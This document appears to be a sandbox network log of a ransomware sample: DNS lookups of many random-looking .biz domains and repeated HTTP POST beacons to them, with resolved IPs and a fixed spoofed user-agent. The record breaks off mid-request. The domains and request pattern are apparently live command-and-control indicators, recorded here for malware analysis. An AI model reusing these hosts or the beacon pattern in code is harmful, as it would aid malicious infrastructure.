8.8.8.8:53

Request

sxmiywsfv.biz

IN A

Response

sxmiywsfv.biz

IN A

13.251.16.150
POST

http://sxmiywsfv.biz/p

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

13.251.16.150:80

Request

POST /p HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: sxmiywsfv.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 876

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 09 Jun 2024 09:04:21 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=4d988646f81ed5c8fb8b26671dae9f50|191.101.209.39|1717923861|1717923861|0|1|0; path=/; domain=.sxmiywsfv.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

fwiwk.biz

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

8.8.8.8:53

Request

fwiwk.biz

IN A

Response

fwiwk.biz

IN A

54.157.24.8

fwiwk.biz

IN A

34.193.97.35

fwiwk.biz

IN A

44.208.124.139
POST

http://fwiwk.biz/qc

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

54.157.24.8:80

Request

POST /qc HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: fwiwk.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 920
POST

http://fwiwk.biz/snkdddkd

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

54.157.24.8:80

Request

POST /snkdddkd HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: fwiwk.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 920
DNS

tbjrpv.biz

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

8.8.8.8:53

Request

tbjrpv.biz

IN A

Response

tbjrpv.biz

IN A

34.246.200.160
POST

http://tbjrpv.biz/ojgjwowcyffpqib

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

34.246.200.160:80

Request

POST /ojgjwowcyffpqib HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: tbjrpv.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 920

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 09 Jun 2024 09:04:21 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=e973c410834e328ac99429e40e7b04c4|191.101.209.39|1717923861|1717923861|0|1|0; path=/; domain=.tbjrpv.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

deoci.biz

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

8.8.8.8:53

Request

deoci.biz

IN A

Response

deoci.biz

IN A

54.80.154.23
POST

http://deoci.biz/nhdtgal

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

54.80.154.23:80

Request

POST /nhdtgal HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: deoci.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 920

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 09 Jun 2024 09:04:21 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=0d4691c7c80e4d9df3f16a7e34706b66|191.101.209.39|1717923861|1717923861|0|1|0; path=/; domain=.deoci.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

gytujflc.biz

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

8.8.8.8:53

Request

gytujflc.biz

IN A

Response

gytujflc.biz

IN A

208.100.26.245
DNS

gytujflc.biz

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

8.8.8.8:53

Request

gytujflc.biz

IN A

Response

gytujflc.biz

IN A

208.100.26.245
DNS

vrrazpdh.biz

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

8.8.8.8:53

Request

vrrazpdh.biz

IN A

Response

vrrazpdh.biz

IN A

34.211.97.45
DNS

whjovd.biz

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

8.8.8.8:53

Request

whjovd.biz

IN A

Response

whjovd.biz

IN A

18.141.10.107
POST

http://gytujflc.biz/sa

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

208.100.26.245:80

Request

POST /sa HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: gytujflc.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 920

Response

HTTP/1.1 404 Not Found

Server: nginx/1.14.0 (Ubuntu)
Date: Sun, 09 Jun 2024 09:04:22 GMT
Content-Type: text/html
Content-Length: 580
Connection: keep-alive
POST

http://gytujflc.biz/owqtsjkyu

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

208.100.26.245:80

Request

POST /owqtsjkyu HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: gytujflc.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 920

Response

HTTP/1.1 404 Not Found

Server: nginx/1.14.0 (Ubuntu)
Date: Sun, 09 Jun 2024 09:04:22 GMT
Content-Type: text/html
Content-Length: 580
Connection: keep-alive
POST

http://yunalwv.biz/o

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

208.100.26.245:80

Request

POST /o HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: yunalwv.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 920

Response

HTTP/1.1 404 Not Found

Server: nginx/1.14.0 (Ubuntu)
Date: Sun, 09 Jun 2024 09:04:25 GMT
Content-Type: text/html
Content-Length: 580
Connection: keep-alive
POST

http://yunalwv.biz/lhaaa

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

208.100.26.245:80

Request

POST /lhaaa HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: yunalwv.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 920

Response

HTTP/1.1 404 Not Found

Server: nginx/1.14.0 (Ubuntu)
Date: Sun, 09 Jun 2024 09:04:25 GMT
Content-Type: text/html
Content-Length: 580
Connection: keep-alive
POST

http://gjogvvpsf.biz/tffotk

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

208.100.26.245:80

Request

POST /tffotk HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: gjogvvpsf.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 920

Response

HTTP/1.1 404 Not Found

Server: nginx/1.14.0 (Ubuntu)
Date: Sun, 09 Jun 2024 09:04:50 GMT
Content-Type: text/html
Content-Length: 580
Connection: keep-alive
POST

http://gjogvvpsf.biz/qnrpymilrm

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

208.100.26.245:80

Request

POST /qnrpymilrm HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: gjogvvpsf.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 920

Response

HTTP/1.1 404 Not Found

Server: nginx/1.14.0 (Ubuntu)
Date: Sun, 09 Jun 2024 09:04:50 GMT
Content-Type: text/html
Content-Length: 580
Connection: keep-alive
POST

http://vrrazpdh.biz/dilmjf

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

34.211.97.45:80

Request

POST /dilmjf HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: vrrazpdh.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 876

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 09 Jun 2024 09:04:22 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=fd1ca3fcc7df490a135d5eb83a32fc5e|191.101.209.39|1717923862|1717923862|0|1|0; path=/; domain=.vrrazpdh.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

qaynky.biz

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

8.8.8.8:53

Request

qaynky.biz

IN A

Response

qaynky.biz

IN A

13.251.16.150
POST

http://qaynky.biz/c

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

13.251.16.150:80

Request

POST /c HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: qaynky.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 920

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 09 Jun 2024 09:04:23 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=805798f8da4e6ad9fc2af843728d0d8c|191.101.209.39|1717923863|1717923863|0|1|0; path=/; domain=.qaynky.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

ftxlah.biz

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

8.8.8.8:53

Request

ftxlah.biz

IN A

Response

ftxlah.biz

IN A

34.218.204.173
POST

http://ftxlah.biz/upw

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

34.218.204.173:80

Request

POST /upw HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: ftxlah.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 876

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 09 Jun 2024 09:04:22 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=16e3912da98bed285a7e5eb5271c2847|191.101.209.39|1717923862|1717923862|0|1|0; path=/; domain=.ftxlah.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

typgfhb.biz

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

8.8.8.8:53

Request

typgfhb.biz

IN A

Response

typgfhb.biz

IN A

13.251.16.150
POST

http://typgfhb.biz/adycfbqeraxyvd

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

13.251.16.150:80

Request

POST /adycfbqeraxyvd HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: typgfhb.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 876

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 09 Jun 2024 09:04:23 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=71c08f46f2024e13d6e851ea981099f6|191.101.209.39|1717923863|1717923863|0|1|0; path=/; domain=.typgfhb.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

bumxkqgxu.biz

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

8.8.8.8:53

Request

bumxkqgxu.biz

IN A

Response

bumxkqgxu.biz

IN A

44.221.84.105
POST

http://bumxkqgxu.biz/f

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

44.221.84.105:80

Request

POST /f HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: bumxkqgxu.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 920

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 09 Jun 2024 09:04:23 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=ccc7460e5a9cab7e126028576b4dcb1f|191.101.209.39|1717923863|1717923863|0|1|0; path=/; domain=.bumxkqgxu.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

dwrqljrr.biz

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

8.8.8.8:53

Request

dwrqljrr.biz

IN A

Response

dwrqljrr.biz

IN A

54.244.188.177
POST

http://dwrqljrr.biz/kyhfsklyycac

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

54.244.188.177:80

Request

POST /kyhfsklyycac HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: dwrqljrr.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 920

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 09 Jun 2024 09:04:23 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=1933586f6978ac680fa69b6916f2250b|191.101.209.39|1717923863|1717923863|0|1|0; path=/; domain=.dwrqljrr.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

173.204.218.34.in-addr.arpa

Remote address:

8.8.8.8:53

Request

173.204.218.34.in-addr.arpa

IN PTR

Response

173.204.218.34.in-addr.arpa

IN PTR

ec2-34-218-204-173 us-west-2compute amazonawscom
DNS

esuzf.biz

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

8.8.8.8:53

Request

esuzf.biz

IN A

Response

esuzf.biz

IN A

34.211.97.45
POST

http://esuzf.biz/kvulftralemdso

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

34.211.97.45:80

Request

POST /kvulftralemdso HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: esuzf.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 876

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 09 Jun 2024 09:04:24 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=46c5e4461a48fbdc6bde11b74631676e|191.101.209.39|1717923864|1717923864|0|1|0; path=/; domain=.esuzf.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

nqwjmb.biz

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

8.8.8.8:53

Request

nqwjmb.biz

IN A

Response

nqwjmb.biz

IN A

35.164.78.200
POST

http://nqwjmb.biz/pmjbvham

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

35.164.78.200:80

Request

POST /pmjbvham HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: nqwjmb.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 920

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 09 Jun 2024 09:04:24 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=7acd0d89e153d89f1cdfed8ea3a7cdd8|191.101.209.39|1717923864|1717923864|0|1|0; path=/; domain=.nqwjmb.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

gvijgjwkh.biz

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

8.8.8.8:53

Request

gvijgjwkh.biz

IN A

Response

gvijgjwkh.biz

IN A

3.94.10.34
DNS

gvijgjwkh.biz

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

8.8.8.8:53

Request

gvijgjwkh.biz

IN A

Response

gvijgjwkh.biz

IN A

3.94.10.34
POST

http://gvijgjwkh.biz/uvyexrirkvn

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

3.94.10.34:80

Request

POST /uvyexrirkvn HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: gvijgjwkh.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 876

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 09 Jun 2024 09:04:24 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=eaee9f885af1878905b4e5a82a8f79e0|191.101.209.39|1717923864|1717923864|0|1|0; path=/; domain=.gvijgjwkh.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

ytctnunms.biz

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

8.8.8.8:53

Request

ytctnunms.biz

IN A

Response

ytctnunms.biz

IN A

3.94.10.34
POST

http://ytctnunms.biz/htut

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

3.94.10.34:80

Request

POST /htut HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: ytctnunms.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 920

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 09 Jun 2024 09:04:24 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=1688d8bf40ff981b3b4037b3bd29b371|191.101.209.39|1717923864|1717923864|0|1|0; path=/; domain=.ytctnunms.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

qpnczch.biz

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

8.8.8.8:53

Request

qpnczch.biz

IN A

Response

qpnczch.biz

IN A

44.213.104.86
POST

http://qpnczch.biz/ovpat

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

44.213.104.86:80

Request

POST /ovpat HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: qpnczch.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 876

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 09 Jun 2024 09:04:24 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=324e01dda87b771c1c09c99adfb789d2|191.101.209.39|1717923864|1717923864|0|1|0; path=/; domain=.qpnczch.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

myups.biz

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

8.8.8.8:53

Request

myups.biz

IN A

Response

myups.biz

IN A

165.160.13.20

myups.biz

IN A

165.160.15.20
POST

http://myups.biz/uxpbqxkwona

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

165.160.13.20:80

Request

POST /uxpbqxkwona HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: myups.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 920

Response

HTTP/1.1 200 OK

Date: Sun, 09 Jun 2024 09:04:25 GMT
Content-Length: 94
POST

http://myups.biz/nhquxflcfbjhxaa

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

165.160.13.20:80

Request

POST /nhquxflcfbjhxaa HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: myups.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 920

Response

HTTP/1.1 200 OK

Date: Sun, 09 Jun 2024 09:04:25 GMT
Content-Length: 94
DNS

brsua.biz

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

8.8.8.8:53

Request

brsua.biz

IN A

Response

brsua.biz

IN A

3.254.94.185
DNS

brsua.biz

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

8.8.8.8:53

Request

brsua.biz

IN A

Response

brsua.biz

IN A

3.254.94.185
POST

http://brsua.biz/ummkdcoywqbiv

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

3.254.94.185:80

Request

POST /ummkdcoywqbiv HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: brsua.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 876

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 09 Jun 2024 09:04:25 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=c37c530adc967f62c22aff130f2da645|191.101.209.39|1717923865|1717923865|0|1|0; path=/; domain=.brsua.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

dlynankz.biz

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

8.8.8.8:53

Request

dlynankz.biz

IN A

Response

dlynankz.biz

IN A

85.214.228.140
POST

http://dlynankz.biz/jpir

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

85.214.228.140:80

Request

POST /jpir HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: dlynankz.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 876

Response

HTTP/1.1 404 Not Found

Server: nginx/1.27.0
Date: Sun, 09 Jun 2024 09:04:25 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Keep-Alive: timeout=20
DNS

oflybfv.biz

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

8.8.8.8:53

Request

oflybfv.biz

IN A

Response

oflybfv.biz

IN A

44.200.43.61
DNS

oflybfv.biz

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

8.8.8.8:53

Request

oflybfv.biz

IN A

Response

oflybfv.biz

IN A

44.200.43.61
DNS

oshhkdluh.biz

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

8.8.8.8:53

Request

oshhkdluh.biz

IN A

Response

oshhkdluh.biz

IN A

54.244.188.177
POST

http://oshhkdluh.biz/xrkxc

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

54.244.188.177:80

Request

POST /xrkxc HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: oshhkdluh.biz
